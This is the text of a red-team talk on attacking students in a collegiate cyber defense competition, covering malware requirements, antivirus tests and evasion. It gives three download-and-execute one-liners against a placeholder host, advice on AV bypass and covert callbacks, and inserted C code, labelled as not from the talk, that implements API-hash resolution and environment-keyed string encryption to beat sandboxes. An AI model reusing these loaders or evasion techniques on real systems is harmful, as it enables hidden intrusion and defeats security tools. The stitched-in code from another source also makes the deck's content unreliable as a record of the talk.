Red Teaming the CCDC: hacking the most paranoid student system administrators in the nation
Matt “scriptjunkie” Weeks
Some funny things: our mistakes and yours
No, don’t start “aCcbsXoAIfRsU”
Those other people logged in are not your friends.
You planned to get hacked?
A year of curating red team wallpaper
Gotta keep up with changing memes
The red team has you
Screenshot inception!
Personal Favorite
https://www.youtube.com/watch?v=TrnUO6TLrtE
The malware games: challenges writing malware
Requirements
Full-featured RAT
File access
Interactive shell
Screenshots, keylogger
May include stealth features
Basic backdoors
Used for re-establishing full-featured RAT
Simple command and/or shellcode execution
Callback or listening
Keylogger/persistent monitoring
File packing tools
Worms – every method possible
Compatibility is hard
Windows XP – Win 8.1
Hook-based keylogging fails…
*NIX’s
Make Windows look great
No two Linux distros start up the same
OS X(!)
NetBSD
OpenBSD
FreeBSD
X64/x86
OpenIndiana (Solaris)
Ubuntu
Fedora
Linux Mint
But hard work pays off, kids
On-the-fly backdoors
Usually you are caught off-guard with at least one system
Webshell collections are your friend
Scripting skills are a must
Shell: while [ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done
Python 2: eval(urllib2.urlopen('http://a.bc/def').read())
VBScript from cmd.exe: echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
First world red team problems:
I accidentally six or seven keylogger copies
On Antivirus, or: why does everybody use MBAM?
Process
Write malware -> Does AV detect?
Yes -> Look for shady code -> Obfuscate functions, strings -> back to "Does AV detect?"
No -> Done!
But usually
Write malware -> Does AV detect? -> No -> Done!
AV test lab
Top market share AVs (Internet Security Suite version) on default settings
7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)
Why not VirusTotal?
Test 1: Widely known malware with 1 byte appended
The only way to fail is by using giant hash lists instead of real signatures
[Result grid of 12 vendor logos; logos not recoverable. Tally: 6 WIN, 6 FAIL]
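To make the Test 1 point concrete, here is an added example (not code from the talk) that runs two toy scanners over a constructed, harmless stand-in sample: one that holds a whole-file digest (a "hash list" entry, with FNV-1a standing in for MD5/SHA-1) and one that holds a content signature (a characteristic byte pattern). Appending a single byte changes the digest and defeats the first scanner while the second still matches. The sample bytes, the marker string and the scanners are all assumptions made for this illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for a "widely known" sample. It is plain text, not
 * malware; the EVIL_MARKER substring plays the role of the family's
 * characteristic byte sequence. */
static const uint8_t KNOWN_SAMPLE[] =
    "MZ This program cannot be run in DOS mode. EVIL_MARKER:download+exec";
#define SAMPLE_LEN (sizeof KNOWN_SAMPLE - 1)

/* Whole-file digest. FNV-1a stands in for the MD5/SHA-1 a hash list holds. */
uint64_t fnv1a64(const uint8_t *p, size_t n) {
    uint64_t h = 1469598103934665603ULL;
    for (size_t i = 0; i < n; i++) {
        h ^= p[i];
        h *= 1099511628211ULL;
    }
    return h;
}

/* Scanner A: hash list. Detects only an exact copy of the known file. */
int hashlist_detects(const uint8_t *p, size_t n) {
    uint64_t listed = fnv1a64(KNOWN_SAMPLE, SAMPLE_LEN); /* the "hash list" entry */
    return fnv1a64(p, n) == listed;
}

/* Scanner B: content signature. Matches the family's byte pattern anywhere
 * in the file, so trailing padding does not matter. */
static const uint8_t SIGNATURE[] = "EVIL_MARKER";
int signature_detects(const uint8_t *p, size_t n) {
    size_t m = sizeof SIGNATURE - 1;
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(p + i, SIGNATURE, m) == 0)
            return 1;
    return 0;
}

/* Test 1 as a function: copy the sample, append one byte, run both scanners.
 * Returns 1 when the padded copy slips past the hash list but not the
 * signature, which is the failure mode the slide describes. */
int padded_copy_evades_hashlist(void) {
    size_t n = SAMPLE_LEN + 1;
    uint8_t *padded = malloc(n);
    if (!padded) return -1;
    memcpy(padded, KNOWN_SAMPLE, SAMPLE_LEN);
    padded[SAMPLE_LEN] = 0x00;              /* the one appended byte */
    int hash_hit = hashlist_detects(padded, n);
    int sig_hit = signature_detects(padded, n);
    free(padded);
    return !hash_hit && sig_hit;
}

int main(void) {
    printf("original: hashlist=%d signature=%d\n",
           hashlist_detects(KNOWN_SAMPLE, SAMPLE_LEN),
           signature_detects(KNOWN_SAMPLE, SAMPLE_LEN));
    printf("one byte appended: evades hash list only = %d\n",
           padded_copy_evades_hashlist());
    return 0;
}
```

Any product that "won" Test 1 was matching on content; any product that failed it could only have been matching on a digest of the whole file, which is why the slide calls it the only way to fail.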
Test 2: Malware with public code samples
[Result grid of 12 vendor logos; logos not recoverable. Tally: 12 FAIL]
Test 3: One-off malware with no evasions
[Result grid of 12 vendor logos; logos not recoverable. Tally: 3 WIN, 7 FAIL, 2 INDECISIVE]
Test 4: "Chris's Ex-Girlfriend" – Highly evasive malware workhorse
[Result grid of 12 vendor logos; logos not recoverable. Tally: 12 FAIL]
Test 5: "The Kraken" – Sneaky firewall-evading malware
[Result grid of 12 vendor logos; logos not recoverable. Tally: 1 WIN, 11 FAIL]
Test 6: Worm with no evasions
[Result grid of 12 vendor logos; logos not recoverable. Tally: 2 WIN, 9 FAIL, 1 "Hosed VM"]
Test 7: Legit program used maliciously
[Result grid of 12 vendor logos; logos not recoverable. Tally: 11 FAIL, 1 INDECISIVE]
Notes
Symantec was only AV to detect reverse meterpreter on the wire
Kaspersky’s behavioral emulation detected one worm well
Kaspersky and Comodo both recognized at least one piece of malware as unusual (not on whitelist), but not necessarily bad
Trend Micro was only AV to block hash dumping
Panda, Avast gave errors installing and were not tested
Final standings
[Ranking grid of vendor logos; logos not recoverable. Labels present: "100% FAIL" (most products), "meh", "TIED 1st" (two products), "3rd"]
Just kidding. After 2 hours obfuscating, these are the real final standings:
[Result grid of 12 vendor logos; logos not recoverable. Tally: 12 FAIL]
How do I bypass AV?
Write your own stuff
Dynamically resolve API calls
Obfuscate strings
Introduce environmental/system dependencies to generically thwart sandboxing
Write your own stuff
Impersonate legitimate software
Watch what hits disk
Digitally sign your stuff if you can
Write your own stuff
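Two of the items above, resolving API calls dynamically and obfuscating strings with an environmental dependency, are shown together in this added example; it is illustration code, not the speaker's malware. API resolution uses the classic ROR13 name hash so the payload carries only 32-bit constants and no import names; the "export table" it searches is a constructed stand-in with hypothetical stub functions, since real code would walk the loaded module's export directory instead. The string key is derived from the target's hostname (the hostnames, the command string and the key derivation are all assumptions), so an emulator or sandbox running under a different name decodes garbage and never sees the real string.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* ---- Dynamically resolve API calls --------------------------------------
 * Classic ROR13 hash: the payload stores 32-bit hashes, never import names,
 * so there is no import table entry or cleartext "WinExec" to signature. */
uint32_t api_hash(const char *name) {
    uint32_t h = 0;
    for (; *name; name++) {
        h = (h >> 13) | (h << 19);      /* rotate right by 13 */
        h += (uint8_t)*name;
    }
    return h;
}

/* Constructed stand-in for a DLL export table. Real code walks the loaded
 * module's export directory (reached via the PEB); the stub bodies here are
 * hypothetical and exist only so the lookup has something to return. */
typedef int (*export_fn)(const char *);
static int stub_WinExec(const char *cmd)      { return 32 + (int)strlen(cmd); }
static int stub_MessageBoxA(const char *text) { return (int)text[0]; }
static const struct { const char *name; export_fn fn; } EXPORTS[] = {
    { "WinExec",     stub_WinExec },
    { "MessageBoxA", stub_MessageBoxA },
};

/* Hash every export name at run time and return the one that matches. */
export_fn resolve_by_hash(uint32_t wanted) {
    for (size_t i = 0; i < sizeof EXPORTS / sizeof EXPORTS[0]; i++)
        if (api_hash(EXPORTS[i].name) == wanted)
            return EXPORTS[i].fn;
    return NULL;
}

/* ---- Obfuscate strings, keyed to the environment -----------------------
 * The key is derived from a value only the target has (its hostname here;
 * an assumption for this example), so a sandbox or emulator under a
 * different name decodes garbage and never sees the real command string. */
uint64_t derive_key(const char *env_value) {
    uint64_t k = 0x5A5A5A5A5A5A5A5AULL;
    for (; *env_value; env_value++)
        k = (k * 6364136223846793005ULL) ^ (uint8_t)*env_value;
    return k;
}

/* XOR each byte with the matching byte of the 64-bit key (repeating). */
void xor_with_key(uint8_t *buf, size_t n, uint64_t key) {
    for (size_t i = 0; i < n; i++)
        buf[i] ^= (uint8_t)(key >> (8 * (i % 8)));
}

/* Encode at build time for the intended host, decode at run time on the host
 * we actually land on; returns 1 only if the decoded bytes equal the original. */
int keyed_string_survives(const char *plain, const char *build_host,
                          const char *run_host) {
    uint8_t buf[64];
    size_t n = strlen(plain);
    if (n >= sizeof buf) return 0;
    memcpy(buf, plain, n);
    xor_with_key(buf, n, derive_key(build_host));  /* what ships in the binary */
    xor_with_key(buf, n, derive_key(run_host));    /* what the target computes */
    return memcmp(buf, plain, n) == 0;
}

int main(void) {
    /* In a real build the hash is a precomputed constant; computing it here
     * from the name is only for illustration. */
    export_fn f = resolve_by_hash(api_hash("WinExec"));
    printf("WinExec resolved: %d\n", f != NULL);
    printf("decode on target : %d\n",
           keyed_string_survives("cmd.exe /c whoami", "ccdc-dc01", "ccdc-dc01"));
    printf("decode in sandbox: %d\n",
           keyed_string_survives("cmd.exe /c whoami", "ccdc-dc01", "SANDBOX-VM"));
    return 0;
}
```

The defensive reading is the same as the offensive one: a sample with almost no imports and no readable strings, whose behaviour depends on the machine it runs on, is exactly what a behavioural emulator cannot fully exercise, which is why the slide recommends tying execution to the environment.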
Security Software Lessons
Some AVs are a total fail
MalwareBytes Pro is in this list with MS, McAfee, F-Secure
Many have one really cool feature or heuristic
Kaspersky, Symantec, Trend Micro
All can be bypassed easily for most malware
Only detection remaining after 2 hours was one worm vs Kaspersky
Hiding from the students
Host hiding
Hide while running
Hide start
Meterpreter is great for functionality, bad for persistence
Mostly custom malware
Mostly standard persistence methods
Don’t run in your own process
Don’t use any of those toy languages with dependencies
Use C!
Don’t hide stuff rootkit finders look for
Don’t sweat the one-offs
Hiding on the wires
Hiding from Wireshark
Harder than hiding on host
Try to blend in with normal traffic
Throw Wireshark crashers
Remove packets from view
Hiding from netstat/tcpview
Using short HTTP(S) requests instead of a persistent TCP callback doesn't leave a connection open for netstat to show
If that fails, blend in by using common ports and cloud IPs
Migrate session to web browser or critical process
Hiding on the wires
Use every protocol that gets out
TCP
UDP
HTTPS
DNS
Use hop points in cloud/web hosting
Use file sharing/paste/social media sites
Random callback selection and delays to avoid monitors
Any way students can send or receive info, you can too
Dealing with firewalls
Two types
Host
Network
Host firewalls
Usually don’t stop outbound traffic
Can go underneath, watch raw packets
Frequently add exceptions or drop the firewall
Network firewalls
Great to own
Tough if you don’t
Use service ports, since they must be able to reach the hosts
Defenses that hurt
Patch or block RCEs
Strict inbound and outbound network firewall rules
Traffic monitoring
Different passwords on all the boxes
Pull the plug
Reverting (sometimes)
Realizing that sometimes, the red team can't hurt you as much as finishing injects helps you
Questions
@scriptjunkie1
https://scriptjunkie.us/